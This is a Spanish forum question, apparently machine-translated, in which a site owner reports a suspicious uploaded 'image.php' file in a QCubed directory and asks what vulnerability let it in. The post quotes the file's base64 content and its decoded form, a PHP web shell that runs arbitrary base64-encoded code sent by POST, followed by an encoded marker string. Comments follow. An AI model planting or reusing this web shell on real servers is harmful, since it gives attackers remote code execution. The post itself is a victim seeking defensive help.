Ok, esto es lo que busqué en Google:
Parece que hay un archivo cargado llamado "image.php" que se carga en un directorio qcubed.
Ese archivo image.php contiene el siguiente código de base 64:
aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw==
decodificada se suma a esto:
if(isset($_POST['e']))
eval(base64_decode($_POST['e']));
echo '3139362e3233312d3137322e32383a6966616365726d7075626d6963653a6166616334326572693032';
buscar la cadena outputed he encontrado vulnerabilidades qcubed simillar en otros sitios.
Decodificación de la última cadena se hizo eco de que tengo:
196.231-172.28:ifacermpubmice:afac42eri02
que realmente el `t entender lo que hace (usando: http://ostermiller.org/calc/encode.html).
¿Puede explicarme en qué me estoy enfrentando aquí? ¿Qué vulnerabilidad de seguridad debo abordar para solucionar esto?
Descubrí lo que podría contener, parece que se parece a la estructura del archivo passwd, échale un vistazo aquí http://www.regatta.cmc.msu.ru/doc/usr/share/man/info/ru_RU/ a_doc_lib/files/aixfiles/passwd.htm, tal vez esto ayude a alguien. – Gabriel
Has dicho que has subido a un directorio qcubed. ¿Puede explicar qué quiere decir con un directorio 'qcubed'? –
@VaibhavKaushal QCubed es un Framework y el directorio qcubed no es esencial. – Gabriel